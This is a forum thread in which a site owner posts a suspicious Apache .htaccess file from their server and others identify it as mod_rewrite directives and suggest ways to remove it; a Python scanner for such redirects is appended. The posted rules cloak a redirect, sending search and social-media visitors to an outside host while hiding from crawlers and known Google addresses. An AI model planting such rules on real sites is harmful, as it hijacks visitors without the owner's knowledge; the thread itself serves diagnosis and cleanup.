What language is this?

This is part of a malware file on my server. I want to learn how to read and disable it. I need to learn the language. Can you help?

# <deactivate www.247marketinggroup.com>
# Reason for deactivation: deactivate%20flag
# Please contact us to remedy this situation as soon as possible
RedirectMatch temp .* http://box334.bluehost.com/suspended.page/disabled.cgi/www.247marketinggroup.com
# </deactivate>



<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*bFP.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule .* - [E=bFP:%{TIME_SEC}]
RewriteRule .* - [E=mBZ:ugustus.bristolblog.com]

RewriteCond %{ENV:bFP} 0
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1340684907394&count=none&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&related=kaskus:Official\%20Kaskus\%20Account&size=m&text=\%5BJ-Music\%5D\%5BIDOL\%5D\%5BHello!Project\%5D\%20S/mileage\%20\%E3\%82\%B9\%E3\%83\%9E\%E3\%82\%A4\%E3\%83\%AC\%E3\%83\%BC\%E3\%82\%B8\%20FANS\%20-\%20http\\%3A\\%2F\\%2Fkask.us/7434479\%20\%23kaskus&url=none&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1340676210490101614564553  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11663:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 1
RewriteRule ^.* http://%{ENV:mBZ}/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif?&dcsdat=1341563984319&dcssip=office.microsoft.com&dcsuri=/en-us/images/results.aspx&dcsqry=?qu=business\%2520finance\%26ctt=1&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&WT.tz=7&WT.ti=Search\%20results\%20for\%20business\%20finance\%20-\%20Images\%20and\%20More\%20-\%20Office.com&WT.le=UTF-8&WT.dl=0&WT.ssl=0&WT.es=office.microsoft.com/en-us/images/results.aspx&WT.cg_n=images&WT.z_css=business\%20finance&WT.dcsvid=78d34d2d90963a43998e579cd229c902&WT.z_MUID=2719E8F1F1D16D2116BCEB64F5D16DFA\%26TUID\%3D1&WT.vt_f_tlh=1341563984&WT.vtvs=1341563903678&WT.vtid=2c67220b76d4e7141c11296756165557&WT.co_f=2c67220b76d4e7141c11296756165557&oo_source=Web&oo_orig_appver=ZPP120&oo_ul=en-US&oo_offver=Other&oo_assetid=EC079000012&oo_market=en-US&oo_bc=images&oo_clicktype=1&oo_hash=mt:2\%7C&WT.z_rviewTrig=1&WT.z_tbb=0&WT.z_searchid=c339655f-522e-47b3-beda-e58b0b1637ed&WT.z_filter_evt=1&WT.z_OriginSubweb=Images\%20and\%20More&WT.z_OriginAssetID=EC079000012&WT.z_PageNumber=4&WT.z_PerPage=25&WT.z_Position=76:77:78:79:80:81:82:83:84:85:86:87:88:89:90:91:92:93:94:95:96:97:98:99:100:&WT.z_SearchAssetID=MP900285084:MP900427941:MP900444146:MP900341936:MP900442307:MP900442965:MP900448379:MP900442969:MP900443263:MP900442414:MP900442294:MP900442178:MP900442513:MP900442214:MP900341889:MP900315594:MP900399487:MP900422401:MP900305913:MP900305912:MP900427657:MP900399495:MP900398759:MP900308987:MP900341968:&wtEvtSrc=office.microsoft.com/en-us/images/results.aspx  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11655:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 2
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=6036211&rn=0.39846566036461484&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11524:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 3
RewriteRule ^.* http://%{ENV:mBZ}/s?referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&volume=100&sd=B6F5EF807HH1341227667509892&feature=related&et=3.036&hbd=4301815&el=detailpage&fexp=920704,921602,901700,913542,907335,922600,919306,924700,914030,907344,907217,920706,924500,902518,919324,906043,919316,912706&vtmp=1&hbt=93.915&sendtmp=1&csipt=watch5&hasstoryboard=1&plid=AATD1uag0Iw35kji&nbe=1&ptk=youtube_none&tpmt=2&w=480&cr=ID&h=360&rt=26.339&vid=Dt7x356SANpp6pHxvDgx0IBCzt9RNQE4C&fmt=34&cfps=0&hl=en_US&sdetail=f:related\%2Crv:MUojevLL1pY&bc=283761&bd=217443&screenh=768&playerw=640&bt=19.945&playerh=390&ns=yt&scoville=1&docid=KLU-qbgFSSs&len=45.746&screenw=1024&sourceid=yw&md=1&pd=1.171&lact=15744&vq=auto&fbe=1&fs=0&st=0&mos=0  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9463:/:0:HttpOnly]

It appears to be an Apache .htaccess file.
https://httpd.apache.org/docs/2.4/howto/htaccess.html

Do you mean it is still active on your server?

What is the name of the file?

Yes

To me, it looks like bluehost has deactivated the 247marketinggroup site for some reason more than it looks like malware.

In any case, you should contact your host be it bluehost or otherwise and have them fix the problem.

It is an .htaccess file in the root directory. What computer language is being used for the script that begins with “RewriteEngine On…”?

Yes it is an active .htaccess file in the root directory. I believe the file is being created by malicious code contained in the file.

Thanks Sam. I know it is an .htaccess file. What I need to know is the programming language for the script that begins at “RewriteEngine On…”

Mittineague Yes, it does appear to be a deactivation file. However, Bluehost denies creating it. Yes, my sites have been deactivated but Bluehost said they do not use a .htaccess file to accomplish deactivation. I have been in contact with Bluehost. While they acknowledge it is not a valid file, they can’t delete it either. I’m stuck until I can delete/modify this .htaccess file to render it harmless.

Try renaming the .htaccess file, then use this web page to check the default PHP get_headers( ‘yoursite.com’ );

jb Url Test

It is a .htaccess file - search for it if you do not believe us.

I do not see how a file can create itself but either way somebody put it there and if it is malware it should be removed ASAP.

If my hosts could not remove the file or seem to take no interest in it I would change hosts. You do not say whether Bluehost think it is a piece of Malware.

Your best bet is to do a clean reinstall of everything.

I wonder if creating a blank .htaccess file locally and trying to overwrite the online .htaccess file would be successful.

Nice thought but no joy. When I tried to upload and overwrite the .htaccess file I received the following error message:

Upload Canceled: could not copy the file “” to “/home1/.htaccess” due to the following error: Operation not permitted"


As @Rubble says, it makes no sense that your host cannot delete it. They ought to have full control.

Rubble. To be clear, I know it is a .htaccess file. What I don’t know is the programming language for the malicious script that follows.

My ISP refuses to get involved with malware. They suggest I hire a security developer to solve the issue.

Yes, I am leaving this host but need to download a Cpanel backup for my next provider. Unfortunately, I can’t do that as long as there is malware infecting my site. I keep getting error messages before the download finishes.

I’m between the proverbial rock and a hard place.

You really shouldn’t be taking a backup of it now if it is infected. You could be taking those infections with you to a new host.

Just to be clear, that’s not a program and it’s not a programming language. They are .htaccess directives as explained in the link @SamA74 gave.
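An added example, not part of any post in this thread: a small Python scanner that reads `mod_rewrite` directives like the ones posted above and reports each redirect to another host together with the conditions that gate it. The sample is a constructed, shortened copy of the posted file; `scan_htaccess` and its result keys are names chosen for this example.

```python
import re

# Constructed sample: a shortened copy of the directives posted in this thread.
SAMPLE = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bot|Crawl|curl|wget).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*bFP.*$ [NC]
RewriteRule .* - [E=bFP:%{TIME_SEC}]
RewriteRule .* - [E=mBZ:ugustus.bristolblog.com]
RewriteCond %{ENV:bFP} 2
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2 [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11524:/:0:HttpOnly]
"""

COND = re.compile(r"^RewriteCond\s+%\{([^}]+)\}\s+(\S+)")
RULE = re.compile(r"^RewriteRule\s+\S+\s+(\S+)(?:\s+\[(.*)\])?\s*$")

def scan_htaccess(text):
    """Report RewriteRules that redirect to another host, and what gates them."""
    env_value, env_gate = {}, {}  # per env var: its value, the tests guarding it
    pending, findings = [], []    # RewriteCond applies only to the next RewriteRule
    for line in map(str.strip, text.splitlines()):
        cond, rule = COND.match(line), RULE.match(line)
        if cond:
            var, pattern = cond.groups()
            pending.append(("!" if pattern.startswith("!") else "") + var)
        elif rule:
            target, flags = rule.group(1), (rule.group(2) or "").split(",")
            gate, pending = set(pending), []
            for test in list(gate):  # a test on ENV:x inherits the tests that set x
                if test.startswith("ENV:"):
                    gate |= env_gate.get(test[4:], set())
            for flag in flags:
                if flag.startswith("E="):  # [E=name:value] stores a variable
                    name, _, value = flag[2:].partition(":")
                    env_value[name], env_gate[name] = value, gate
            # Expand %{ENV:name} so the real destination host is visible.
            resolved = re.sub(r"%\{ENV:(\w+)\}",
                              lambda m: env_value.get(m.group(1), m.group(0)), target)
            host = re.match(r"https?://([^/?%]+)(?=[/?]|$)", resolved)
            if host and any(f == "R" or f.startswith("R=") for f in flags):
                findings.append({
                    "host": host.group(1),
                    "referer_gated": "HTTP_REFERER" in gate,
                    "hidden_from_crawlers": "!HTTP_USER_AGENT" in gate,
                    "sets_cookie": any(f.startswith("CO=") for f in flags),
                })
    return findings

print(scan_htaccess(SAMPLE))
```

A finding that is both referer-gated and hidden from crawlers describes a redirect that the site owner, typing the address directly or testing with `curl`, would not see.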

Thanks John but I get a File Op error when trying to rename the .htaccess file. The error result is “Operation not permitted.”

I’m surprised malware would redirect to bluehost and not some mal site.

Anyway, you may be having a problem because of the leading “dot” i.e. .htaccess

I haven’t done so for some time, but years ago I had trouble uploading htaccess files to a host. My solution was to create the file as a txt file - htaccess.txt then rename it to .htaccess and when prompted with overwrite? confirm.

Maybe instead of trying to work directly with the file that’s on the server you’ll be able to replace it that way?
